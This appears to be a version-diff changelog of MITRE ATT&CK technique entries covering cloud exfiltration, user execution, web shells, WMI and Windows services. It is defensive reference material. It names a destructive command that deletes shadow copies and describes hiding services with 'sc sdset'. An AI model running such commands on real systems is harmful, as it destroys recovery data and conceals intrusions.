New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-16 19:21:04.897000+00:002024-04-11 15:53:00.577000+00:00
descriptionAdversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection. A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces. Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service. A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.(Citation: TLDRSec AWS Attacks) Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature) Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TLDRSec AWS Attacks', 'description': 'Clint Gibler and Scott Piper. (2021, January 4). Lesser Known Techniques for Attacking AWS Environments. Retrieved March 4, 2024.', 'url': 'https://tldrsec.com/p/blog-lesser-known-aws-attacks'}
external_references{'source_name': 'Microsoft Azure Storage Shared Access Signature', 'description': 'Microsoft. (2023, June 7). Grant limited access to Azure Storage resources using shared access signatures (SAS). Retrieved March 4, 2024.', 'url': 'https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview'}
x_mitre_contributorsGabriel Currie
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_platformsSaaS
x_mitre_platformsGoogle Workspace
x_mitre_platformsOffice 365

[T1059.004] Command and Scripting Interpreter: Unix Shell

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'root']
values_changed
STIX FieldOld valueNew Value
modified2021-07-26 22:34:43.261000+00:002024-04-16 12:24:40.163000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1550] Use Alternate Authentication Material

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_contributors['Blake Strom, Microsoft Threat Intelligence']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 12:57:34.058000+00:002024-04-12 21:18:23.798000+00:00
x_mitre_version1.21.3

[T1204] User Execution

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
New Description
t1An adversary may rely upon specific actions by a user in ordt1An adversary may rely upon specific actions by a user in ord
>er to gain execution. Users may be subjected to social engin>er to gain execution. Users may be subjected to social engin
>eering to get them to execute malicious code by, for example>eering to get them to execute malicious code by, for example
>, opening a malicious document file or link. These user acti>, opening a malicious document file or link. These user acti
>ons will typically be observed as follow-on behavior from fo>ons will typically be observed as follow-on behavior from fo
>rms of [Phishing](https://attack.mitre.org/techniques/T1566)>rms of [Phishing](https://attack.mitre.org/techniques/T1566)
>.  While [User Execution](https://attack.mitre.org/technique>.  While [User Execution](https://attack.mitre.org/technique
>s/T1204) frequently occurs shortly after Initial Access it m>s/T1204) frequently occurs shortly after Initial Access it m
>ay occur at other phases of an intrusion, such as when an ad>ay occur at other phases of an intrusion, such as when an ad
>versary places a file in a shared directory or on a user's d>versary places a file in a shared directory or on a user's d
>esktop hoping that a user will click on it. This activity ma>esktop hoping that a user will click on it. This activity ma
>y also be seen shortly after [Internal Spearphishing](https:>y also be seen shortly after [Internal Spearphishing](https:
>//attack.mitre.org/techniques/T1534).  Adversaries may also >//attack.mitre.org/techniques/T1534).  Adversaries may also 
>deceive users into performing actions such as enabling [Remo>deceive users into performing actions such as enabling [Remo
>te Access Software](https://attack.mitre.org/techniques/T121>te Access Software](https://attack.mitre.org/techniques/T121
>9), allowing direct control of the system to the adversary, >9), allowing direct control of the system to the adversary
>or downloading and executing malware for [User Execution](ht>running malicious JavaScript in their browserallowing adve
>tps://attack.mitre.org/techniques/T1204). For example, tech >rsaries to [Steal Web Session Cookie](https://attack.mitre.o
>support scams can be facilitated through [Phishing](https://>rg/techniques/T1539)s; or downloading and executing malware 
>attack.mitre.org/techniques/T1566), vishing, or various form>for [User Execution](https://attack.mitre.org/techniques/T12
>s of user interaction. Adversaries can use a combination of >04).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Disco
>these methods, such as spoofing and promoting toll-free numb>rd Bookmarks 2023)  For example, tech support scams can be f
>ers or call centers that are used to direct victims to malic>acilitated through [Phishing](https://attack.mitre.org/techn
>ious websites, to deliver and execute payloads containing ma>iques/T1566), vishing, or various forms of user interaction.
>lware or [Remote Access Software](https://attack.mitre.org/t> Adversaries can use a combination of these methods, such as
>echniques/T1219).(Citation: Telephone Attack Delivery)> spoofing and promoting toll-free numbers or call centers th
 >at are used to direct victims to malicious websites, to deli
 >ver and execute payloads containing malware or [Remote Acces
 >s Software](https://attack.mitre.org/techniques/T1219).(Cita
 >tion: Telephone Attack Delivery)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 20:31:15.373000+00:002024-04-12 03:46:49.507000+00:00
descriptionAn adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023) For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.51.6
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Krebs Discord Bookmarks 2023', 'description': 'Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.', 'url': 'https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/'}
external_references{'source_name': 'Talos Roblox Scam 2023', 'description': 'Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”. Retrieved January 2, 2024.', 'url': 'https://blog.talosintelligence.com/roblox-scam-overview/'}
x_mitre_contributorsGoldstein Menachem

[T1071.001] Application Layer Protocol: Web Protocols

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-29 20:22:37.414000+00:002024-04-16 12:28:21.234000+00:00
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1505.003] Server Software Component: Web Shell

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may backdoor web servers with web shells to estat1Adversaries may backdoor web servers with web shells to esta
>blish persistent access to systems. A Web shell is a Web scr>blish persistent access to systems. A Web shell is a Web scr
>ipt that is placed on an openly accessible Web server to all>ipt that is placed on an openly accessible Web server to all
>ow an adversary to use the Web server as a gateway into a ne>ow an adversary to access the Web server as a gateway into a
>twork. A Web shell may provide a set of functions to execute> network. A Web shell may provide a set of functions to exec
> or a command-line interface on the system that hosts the We>ute or a command-line interface on the system that hosts the
>b server.(Citation: volexity_0day_sophos_FW)  In addition to> Web server.(Citation: volexity_0day_sophos_FW)  In addition
> a server-side script, a Web shell may have a client interfa> to a server-side script, a Web shell may have a client inte
>ce program that is used to talk to the Web server (e.g. [Chi>rface program that is used to talk to the Web server (e.g. [
>na Chopper](https://attack.mitre.org/software/S0020) Web she>China Chopper](https://attack.mitre.org/software/S0020) Web 
>ll client).(Citation: Lee 2013)>shell client).(Citation: Lee 2013)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_system_requirements['Adversary access to Web server with vulnerability or account to upload and serve the Web shell file.']
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:53.223000+00:002024-04-16 12:45:06.434000+00:00
descriptionAdversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.31.4

[T1059.003] Command and Scripting Interpreter: Windows Command Shell

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2023-07-28 17:50:21.947000+00:002024-03-01 17:35:02.889000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4

[T1047] Windows Management Instrumentation

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may abuse Windows Management Instrumentation (WMt1Adversaries may abuse Windows Management Instrumentation (WM
>I) to execute malicious commands and payloads. WMI is an adm>I) to execute malicious commands and payloads. WMI is design
>inistration feature that provides a uniform environment to a>ed for programmers and is the infrastructure for management 
>ccess Windows system components. The WMI service enables bot>data and operations on Windows systems.(Citation: WMI 1-3) W
>h local and remote access, though the latter is facilitated >MI is an administration feature that provides a uniform envi
>by [Remote Services](https://attack.mitre.org/techniques/T10>ronment to access Windows system components.  The WMI servic
>21) such as [Distributed Component Object Model](https://att>e enables both local and remote access, though the latter is
>ack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remo> facilitated by [Remote Services](https://attack.mitre.org/t
>te Management](https://attack.mitre.org/techniques/T1021/006>echniques/T1021) such as [Distributed Component Object Model
>) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates>](https://attack.mitre.org/techniques/T1021/003) and [Window
> using port 135, whereas WMI over WinRM operates over port 5>s Remote Management](https://attack.mitre.org/techniques/T10
>985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(>21/006).(Citation: WMI 1-3) Remote WMI over DCOM operates us
>Citation: FireEye WMI 2015)  An adversary can use WMI to int>ing port 135, whereas WMI over WinRM operates over port 5985
>eract with local and remote systems and use it as a means to> when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Cit
> execute various behaviors, such as gathering information fo>ation: Mandiant WMI)  An adversary can use WMI to interact w
>r Discovery as well as remote Execution of files as part of >ith local and remote systems and use it as a means to execut
>Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citatio>e various behaviors, such as gathering information for [Disc
>n: FireEye WMI 2015)>overy](https://attack.mitre.org/tactics/TA0007) as well as [
 >Execution](https://attack.mitre.org/tactics/TA0002) of comma
 >nds and payloads.(Citation: Mandiant WMI) For example, `wmic
 >.exe` can be abused by an adversary to delete shadow copies 
 >with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibi
 >t System Recovery](https://attack.mitre.org/techniques/T1490
 >)).(Citation: WMI 6)  **Note:** `wmic.exe` is deprecated as 
 >of January of 2024, with the WMIC feature being “disabled by
 > default” on Windows 11+. WMIC will be removed from subseque
 >nt Windows releases and replaced by [PowerShell](https://att
 >ack.mitre.org/techniques/T1059/001) as the primary WMI inter
 >face.(Citation: WMI 7,8) In addition to PowerShell and tools
 > like `wbemtool.exe`, COM APIs can also be used to programma
 >tically interact with WMI via C++, .NET, VBScript, etc.(Cita
 >tion: WMI 7,8)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-07-24 20:38:58.283000+00:002024-04-11 18:13:25.130000+00:00
descriptionAdversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6) **Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
external_references[3]['source_name']MSDN WMIMandiant WMI
external_references[3]['description']Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.Mandiant. (n.d.). Retrieved February 13, 2024.
external_references[3]['url']https://msdn.microsoft.com/en-us/library/aa394582.aspxhttps://www.mandiant.com/resources/reports
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'WMI 6', 'description': 'Microsoft. (2022, June 13). BlackCat. Retrieved February 13, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/'}
external_references{'source_name': 'WMI 1-3', 'description': 'Microsoft. (2023, March 7). Retrieved February 13, 2024.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page?redirectedfrom=MSDN'}
external_references{'source_name': 'WMI 7,8', 'description': 'Microsoft. (2024, January 26). WMIC Deprecation. Retrieved February 13, 2024.', 'url': 'https://techcommunity.microsoft.com/t5/windows-it-pro-blog/wmi-command-line-wmic-utility-deprecation-next-steps/ba-p/4039242'}
x_mitre_contributorsTristan Madani
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye WMI SANS 2015', 'description': "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.", 'url': 'https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf'}

[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may establish persistence and elevate privilegest1Adversaries may establish persistence and elevate privileges
> by executing malicious content triggered by a Windows Manag> by executing malicious content triggered by a Windows Manag
>ement Instrumentation (WMI) event subscription. WMI can be u>ement Instrumentation (WMI) event subscription. WMI can be u
>sed to install event filters, providers, consumers, and bind>sed to install event filters, providers, consumers, and bind
>ings that execute code when a defined event occurs. Examples>ings that execute code when a defined event occurs. Examples
> of events that may be subscribed to are the wall clock time> of events that may be subscribed to are the wall clock time
>, user loging, or the computer's uptime.(Citation: Mandiant >, user login, or the computer's uptime.(Citation: Mandiant M
>M-Trends 2015)  Adversaries may use the capabilities of WMI >-Trends 2015)  Adversaries may use the capabilities of WMI t
>to subscribe to an event and execute arbitrary code when tha>o subscribe to an event and execute arbitrary code when that
>t event occurs, providing persistence on a system.(Citation:> event occurs, providing persistence on a system.(Citation: 
> FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversar>FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversari
>ies may also compile WMI scripts into Windows Management Obj>es may also compile WMI scripts – using `mofcomp.exe`  –into
>ect (MOF) files (.mof extension) that can be used to create > Windows Management Object (MOF) files (.mof extension) that
>a malicious subscription.(Citation: Dell WMI Persistence)(Ci> can be used to create a malicious subscription.(Citation: D
>tation: Microsoft MOF May 2018)  WMI subscription execution >ell WMI Persistence)(Citation: Microsoft MOF May 2018)  WMI 
>is proxied by the WMI Provider Host process (WmiPrvSe.exe) a>subscription execution is proxied by the WMI Provider Host p
>nd thus may result in elevated SYSTEM privileges.>rocess (WmiPrvSe.exe) and thus may result in elevated SYSTEM
 > privileges.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-21 12:32:38.796000+00:002024-04-13 14:08:20.882000+00:00
descriptionAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using `mofcomp.exe` –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsViren Chaudhari, Qualys
x_mitre_data_sourcesFile: File Creation

[T1543.003] Create or Modify System Process: Windows Service

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may create or modify Windows services to repeatet1Adversaries may create or modify Windows services to repeate
>dly execute malicious payloads as part of persistence. When >dly execute malicious payloads as part of persistence. When 
>Windows boots up, it starts programs or applications called >Windows boots up, it starts programs or applications called 
>services that perform background system functions.(Citation:>services that perform background system functions.(Citation:
> TechNet Services) Windows service configuration information> TechNet Services) Windows service configuration information
>, including the file path to the service's executable or rec>, including the file path to the service's executable or rec
>overy programs/commands, is stored in the Windows Registry. >overy programs/commands, is stored in the Windows Registry. 
> Adversaries may install a new service or modify an existing> Adversaries may install a new service or modify an existing
> service to execute at startup in order to persist on a syst> service to execute at startup in order to persist on a syst
>em. Service configurations can be set or modified using syst>em. Service configurations can be set or modified using syst
>em utilities (such as sc.exe), by directly modifying the Reg>em utilities (such as sc.exe), by directly modifying the Reg
>istry, or by interacting directly with the Windows API.   Ad>istry, or by interacting directly with the Windows API.   Ad
>versaries may also use services to install and execute malic>versaries may also use services to install and execute malic
>ious drivers. For example, after dropping a driver file (ex:>ious drivers. For example, after dropping a driver file (ex:
> `.sys`) to disk, the payload can be loaded and registered v> `.sys`) to disk, the payload can be loaded and registered v
>ia [Native API](https://attack.mitre.org/techniques/T1106) f>ia [Native API](https://attack.mitre.org/techniques/T1106) f
>unctions such as `CreateServiceW()` (or manually via functio>unctions such as `CreateServiceW()` (or manually via functio
>ns such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creat>ns such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creat
>ing the required service Registry values (i.e. [Modify Regis>ing the required service Registry values (i.e. [Modify Regis
>try](https://attack.mitre.org/techniques/T1112)), or by usin>try](https://attack.mitre.org/techniques/T1112)), or by usin
>g command-line utilities such as `PnPUtil.exe`.(Citation: Sy>g command-line utilities such as `PnPUtil.exe`.(Citation: Sy
>mantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlay>mantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlay
>er February 2022)(Citation: Unit42 AcidBox June 2020) Advers>er February 2022)(Citation: Unit42 AcidBox June 2020) Advers
>aries may leverage these drivers as [Rootkit](https://attack>aries may leverage these drivers as [Rootkit](https://attack
>.mitre.org/techniques/T1014)s to hide the presence of malici>.mitre.org/techniques/T1014)s to hide the presence of malici
>ous activity on a system. Adversaries may also load a signed>ous activity on a system. Adversaries may also load a signed
> yet vulnerable driver onto a compromised machine (known as > yet vulnerable driver onto a compromised machine (known as 
>"Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Expl>"Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Expl
>oitation for Privilege Escalation](https://attack.mitre.org/>oitation for Privilege Escalation](https://attack.mitre.org/
>techniques/T1068).(Citation: ESET InvisiMole June 2020)(Cita>techniques/T1068).(Citation: ESET InvisiMole June 2020)(Cita
>tion: Unit42 AcidBox June 2020)  Services may be created wit>tion: Unit42 AcidBox June 2020)  Services may be created wit
>h administrator privileges but are executed under SYSTEM pri>h administrator privileges but are executed under SYSTEM pri
>vileges, so an adversary may also use a service to escalate >vileges, so an adversary may also use a service to escalate 
>privileges. Adversaries may also directly start services thr>privileges. Adversaries may also directly start services thr
>ough [Service Execution](https://attack.mitre.org/techniques>ough [Service Execution](https://attack.mitre.org/techniques
>/T1569/002). To make detection analysis more challenging, ma>/T1569/002).  To make detection analysis more challenging, m
>licious services may also incorporate [Masquerade Task or Se>alicious services may also incorporate [Masquerade Task or S
>rvice](https://attack.mitre.org/techniques/T1036/004) (ex: u>ervice](https://attack.mitre.org/techniques/T1036/004) (ex: 
>sing a service and/or payload name related to a legitimate O>using a service and/or payload name related to a legitimate 
>S or benign software component).>OS or benign software component). Adversaries may also creat
 >e ‘hidden’ services (i.e., [Hide Artifacts](https://attack.m
 >itre.org/techniques/T1564)), for example by using the `sc sd
 >set` command to set service permissions via the Service Desc
 >riptor Definition Language (SDDL). This may hide a Windows s
 >ervice from the view of standard service enumeration methods
 > such as `Get-Service`, `sc query`, and `services.exe`.(Cita
 >tion: SANS 1)(Citation: SANS 2)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-15 16:42:25.014000+00:002024-04-11 19:25:51.394000+00:00
descriptionAdversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'SANS 1', 'description': 'Joshua Wright. (2020, October 13). Retrieved March 22, 2024.', 'url': 'https://www.sans.org/blog/red-team-tactics-hiding-windows-services/'}
